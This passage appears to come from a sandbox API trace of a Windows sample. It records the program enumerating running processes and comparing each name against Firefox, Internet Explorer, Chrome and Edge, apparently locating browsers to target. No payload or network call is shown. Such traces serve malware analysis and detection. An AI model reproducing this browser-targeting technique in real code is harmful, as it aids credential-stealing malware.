lpString2="microsoftedgecp.exe") returned 1 [0258.907] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0258.908] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0258.908] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0258.908] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0258.908] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0258.908] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0258.908] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0258.908] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0258.908] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0258.908] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0258.908] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0258.909] lstrcmpiA (lpString1="audiodg.exe", lpString2="firefox.exe") returned -1 [0258.909] lstrcmpiA (lpString1="audiodg.exe", lpString2="iexplore.exe") returned -1 [0258.909] lstrcmpiA (lpString1="audiodg.exe", lpString2="chrome.exe") returned -1 [0258.909] lstrcmpiA (lpString1="audiodg.exe", lpString2="microsoftedgecp.exe") returned -1 [0258.909] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0258.909] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0258.909] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0258.910] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0258.910] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0258.910] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0258.910] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0258.910] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0258.910] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0258.910] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0258.910] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0258.911] lstrcmpiA (lpString1="dwm.exe", lpString2="firefox.exe") returned -1 [0258.911] lstrcmpiA (lpString1="dwm.exe", lpString2="iexplore.exe") returned -1 [0258.911] lstrcmpiA (lpString1="dwm.exe", lpString2="chrome.exe") returned 1 [0258.911] lstrcmpiA (lpString1="dwm.exe", lpString2="microsoftedgecp.exe") returned -1 [0258.911] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0258.911] lstrcmpiA (lpString1="spoolsv.exe", lpString2="firefox.exe") returned 1 [0258.911] lstrcmpiA (lpString1="spoolsv.exe", lpString2="iexplore.exe") returned 1 [0258.911] lstrcmpiA (lpString1="spoolsv.exe", lpString2="chrome.exe") returned 1 [0258.911] lstrcmpiA (lpString1="spoolsv.exe", lpString2="microsoftedgecp.exe") returned 1 [0258.911] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0258.912] lstrcmpiA (lpString1="taskhost.exe", lpString2="firefox.exe") returned 1 [0258.912] lstrcmpiA (lpString1="taskhost.exe", lpString2="iexplore.exe") returned 1 [0258.912] lstrcmpiA (lpString1="taskhost.exe", lpString2="chrome.exe") returned 1 [0258.912] lstrcmpiA (lpString1="taskhost.exe", lpString2="microsoftedgecp.exe") returned 1 [0258.912] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0258.912] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0258.912] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0258.912] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0258.912] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0258.912] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0258.913] lstrcmpiA (lpString1="taskeng.exe", lpString2="firefox.exe") returned 1 [0258.913] lstrcmpiA (lpString1="taskeng.exe", lpString2="iexplore.exe") returned 1 [0258.913] lstrcmpiA (lpString1="taskeng.exe", lpString2="chrome.exe") returned 1 [0258.913] lstrcmpiA (lpString1="taskeng.exe", lpString2="microsoftedgecp.exe") returned 1 [0258.913] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="abortion-serbia-effect.exe")) returned 1 [0258.913] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="firefox.exe") returned -1 [0258.913] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="iexplore.exe") returned -1 [0258.913] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="chrome.exe") returned -1 [0258.913] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="microsoftedgecp.exe") returned -1 [0258.914] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beverages-tapes-dod.exe")) returned 1 [0258.914] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="firefox.exe") returned -1 [0258.914] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="iexplore.exe") returned -1 [0258.914] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="chrome.exe") returned -1 [0258.914] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="microsoftedgecp.exe") returned -1 [0258.914] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="receptor paintings.exe")) returned 1 [0258.915] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="firefox.exe") returned 1 [0258.915] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="iexplore.exe") returned 1 [0258.915] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="chrome.exe") returned 1 [0258.915] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="microsoftedgecp.exe") returned 1 [0258.915] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x780, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="definitely.exe")) returned 1 [0258.915] lstrcmpiA (lpString1="definitely.exe", lpString2="firefox.exe") returned -1 [0258.915] lstrcmpiA (lpString1="definitely.exe", lpString2="iexplore.exe") returned -1 [0258.915] lstrcmpiA (lpString1="definitely.exe", lpString2="chrome.exe") returned 1 [0258.915] lstrcmpiA (lpString1="definitely.exe", lpString2="microsoftedgecp.exe") returned -1 [0258.915] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="knewdifferenceskaren.exe")) returned 1 [0258.916] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="firefox.exe") returned 1 [0258.916] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="iexplore.exe") returned 1 [0258.916] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="chrome.exe") returned 1 [0258.916] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="microsoftedgecp.exe") returned -1 [0258.916] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="whenever.exe")) returned 1 [0258.916] lstrcmpiA (lpString1="whenever.exe", lpString2="firefox.exe") returned 1 [0258.916] lstrcmpiA (lpString1="whenever.exe", lpString2="iexplore.exe") returned 1 [0258.916] lstrcmpiA (lpString1="whenever.exe", lpString2="chrome.exe") returned 1 [0258.916] lstrcmpiA (lpString1="whenever.exe", lpString2="microsoftedgecp.exe") returned 1 [0258.916] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="potentially.exe")) returned 1 [0258.917] lstrcmpiA (lpString1="potentially.exe", lpString2="firefox.exe") returned 1 [0258.917] lstrcmpiA (lpString1="potentially.exe", lpString2="iexplore.exe") returned 1 [0258.917] lstrcmpiA (lpString1="potentially.exe", lpString2="chrome.exe") returned 1 [0258.917] lstrcmpiA (lpString1="potentially.exe", lpString2="microsoftedgecp.exe") returned 1 [0258.917] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x314, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="seeker.exe")) returned 1 [0258.917] lstrcmpiA (lpString1="seeker.exe", lpString2="firefox.exe") returned 1 [0258.917] lstrcmpiA (lpString1="seeker.exe", lpString2="iexplore.exe") returned 1 [0258.917] lstrcmpiA (lpString1="seeker.exe", lpString2="chrome.exe") returned 1 [0258.917] lstrcmpiA (lpString1="seeker.exe", lpString2="microsoftedgecp.exe") returned 1 [0258.917] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x320, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="objects-virus-israeli.exe")) returned 1 [0258.918] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="firefox.exe") returned 1 [0258.918] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="iexplore.exe") returned 1 [0258.918] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="chrome.exe") returned 1 [0258.918] lstrcmpiA (lpString1="objects-virus-israeli.exe", lpString2="microsoftedgecp.exe") returned 1 [0258.918] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="birth bean.exe")) returned 1 [0258.919] lstrcmpiA (lpString1="birth bean.exe", lpString2="firefox.exe") returned -1 [0258.919] lstrcmpiA (lpString1="birth bean.exe", lpString2="iexplore.exe") returned -1 [0258.919] lstrcmpiA (lpString1="birth bean.exe", lpString2="chrome.exe") returned -1 [0258.919] lstrcmpiA (lpString1="birth bean.exe", lpString2="microsoftedgecp.exe") returned -1 [0258.919] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ruby.exe")) returned 1 [0258.919] lstrcmpiA (lpString1="ruby.exe", lpString2="firefox.exe") returned 1 [0258.919] lstrcmpiA (lpString1="ruby.exe", lpString2="iexplore.exe") returned 1 [0258.919] lstrcmpiA (lpString1="ruby.exe", lpString2="chrome.exe") returned 1 [0258.919] lstrcmpiA (lpString1="ruby.exe", lpString2="microsoftedgecp.exe") returned 1 [0258.919] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="zoodiffer.exe")) returned 1 [0258.920] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="firefox.exe") returned 1 [0258.920] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="iexplore.exe") returned 1 [0258.920] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="chrome.exe") returned 1 [0258.920] lstrcmpiA (lpString1="zoodiffer.exe", lpString2="microsoftedgecp.exe") returned 1 [0258.920] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="smith.exe")) returned 1 [0258.920] lstrcmpiA (lpString1="smith.exe", lpString2="firefox.exe") returned 1 [0258.920] lstrcmpiA (lpString1="smith.exe", lpString2="iexplore.exe") returned 1 [0258.920] lstrcmpiA (lpString1="smith.exe", lpString2="chrome.exe") returned 1 [0258.920] lstrcmpiA (lpString1="smith.exe", lpString2="microsoftedgecp.exe") returned 1 [0258.920] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="spicedespite.exe")) returned 1 [0258.921] lstrcmpiA (lpString1="spicedespite.exe", lpString2="firefox.exe") returned 1 [0258.921] lstrcmpiA (lpString1="spicedespite.exe", lpString2="iexplore.exe") returned 1 [0258.921] lstrcmpiA (lpString1="spicedespite.exe", lpString2="chrome.exe") returned 1 [0258.921] lstrcmpiA (lpString1="spicedespite.exe", lpString2="microsoftedgecp.exe") returned 1 [0258.921] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x644, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="wooden.exe")) returned 1 [0258.921] lstrcmpiA (lpString1="wooden.exe", lpString2="firefox.exe") returned 1 [0258.921] lstrcmpiA (lpString1="wooden.exe", lpString2="iexplore.exe") returned 1 [0258.921] lstrcmpiA (lpString1="wooden.exe", lpString2="chrome.exe") returned 1 [0258.921] lstrcmpiA (lpString1="wooden.exe", lpString2="microsoftedgecp.exe") returned 1 [0258.921] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dallasr.exe")) returned 1 [0258.922] lstrcmpiA (lpString1="dallasr.exe", lpString2="firefox.exe") returned -1 [0258.922] lstrcmpiA (lpString1="dallasr.exe", lpString2="iexplore.exe") returned -1 [0258.922] lstrcmpiA (lpString1="dallasr.exe", lpString2="chrome.exe") returned 1 [0258.922] lstrcmpiA (lpString1="dallasr.exe", lpString2="microsoftedgecp.exe") returned -1 [0258.922] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="bags shakira tourism.exe")) returned 1 [0258.923] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="firefox.exe") returned -1 [0258.923] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="iexplore.exe") returned -1 [0258.923] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="chrome.exe") returned -1 [0258.923] lstrcmpiA (lpString1="bags shakira tourism.exe", lpString2="microsoftedgecp.exe") returned -1 [0258.923] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="constadvertisement.exe")) returned 1 [0258.923] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="firefox.exe") returned -1 [0258.923] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="iexplore.exe") returned -1 [0258.923] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="chrome.exe") returned 1 [0258.923] lstrcmpiA (lpString1="constadvertisement.exe", lpString2="microsoftedgecp.exe") returned -1 [0258.923] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sensors-democrat.exe")) returned 1 [0258.924] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="firefox.exe") returned 1 [0258.924] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="iexplore.exe") returned 1 [0258.924] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="chrome.exe") returned 1 [0258.924] lstrcmpiA (lpString1="sensors-democrat.exe", lpString2="microsoftedgecp.exe") returned 1 [0258.924] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="doctrine alcohol.exe")) returned 1 [0258.924] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="firefox.exe") returned -1 [0258.924] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="iexplore.exe") returned -1 [0258.924] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="chrome.exe") returned 1 [0258.924] lstrcmpiA (lpString1="doctrine alcohol.exe", lpString2="microsoftedgecp.exe") returned -1 [0258.924] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="population openings.exe")) returned 1 [0258.925] lstrcmpiA (lpString1="population openings.exe", lpString2="firefox.exe") returned 1 [0258.925] lstrcmpiA (lpString1="population openings.exe", lpString2="iexplore.exe") returned 1 [0258.925] lstrcmpiA (lpString1="population openings.exe", lpString2="chrome.exe") returned 1 [0258.925] lstrcmpiA (lpString1="population openings.exe", lpString2="microsoftedgecp.exe") returned 1 [0258.925] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0258.925] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="firefox.exe") returned 1 [0258.925] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="iexplore.exe") returned 1 [0258.925] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="chrome.exe") returned 1 [0258.926] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="microsoftedgecp.exe") returned 1 [0258.926] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa38, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0258.926] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0258.926] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0258.926] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0258.926] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0258.926] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa58, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0258.927] lstrcmpiA (lpString1="sppsvc.exe", lpString2="firefox.exe") returned 1 [0258.927] lstrcmpiA (lpString1="sppsvc.exe", lpString2="iexplore.exe") returned 1 [0258.927] lstrcmpiA (lpString1="sppsvc.exe", lpString2="chrome.exe") returned 1 [0258.927] lstrcmpiA (lpString1="sppsvc.exe", lpString2="microsoftedgecp.exe") returned 1 [0258.927] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa70, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0258.927] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0258.927] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0258.927] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0258.927] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0258.927] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0258.928] lstrcmpiA (lpString1="taskhost.exe", lpString2="firefox.exe") returned 1 [0258.928] lstrcmpiA (lpString1="taskhost.exe", lpString2="iexplore.exe") returned 1 [0258.928] lstrcmpiA (lpString1="taskhost.exe", lpString2="chrome.exe") returned 1 [0258.928] lstrcmpiA (lpString1="taskhost.exe", lpString2="microsoftedgecp.exe") returned 1 [0258.928] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1a, th32ParentProcessID=0x1b0, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0258.928] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0258.928] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0258.928] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0258.928] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0258.928] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x790, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0258.929] lstrcmpiA (lpString1="taskeng.exe", lpString2="firefox.exe") returned 1 [0258.929] lstrcmpiA (lpString1="taskeng.exe", lpString2="iexplore.exe") returned 1 [0258.929] lstrcmpiA (lpString1="taskeng.exe", lpString2="chrome.exe") returned 1 [0258.929] lstrcmpiA (lpString1="taskeng.exe", lpString2="microsoftedgecp.exe") returned 1 [0258.929] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x92c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0258.929] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0258.929] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0258.929] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0258.929] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0258.929] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x924, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0258.930] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0258.930] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0258.930] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0258.930] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0258.930] Process32Next (in: hSnapshot=0xd4, lppe=0x1dfcd0 | out: lppe=0x1dfcd0*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x958, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, 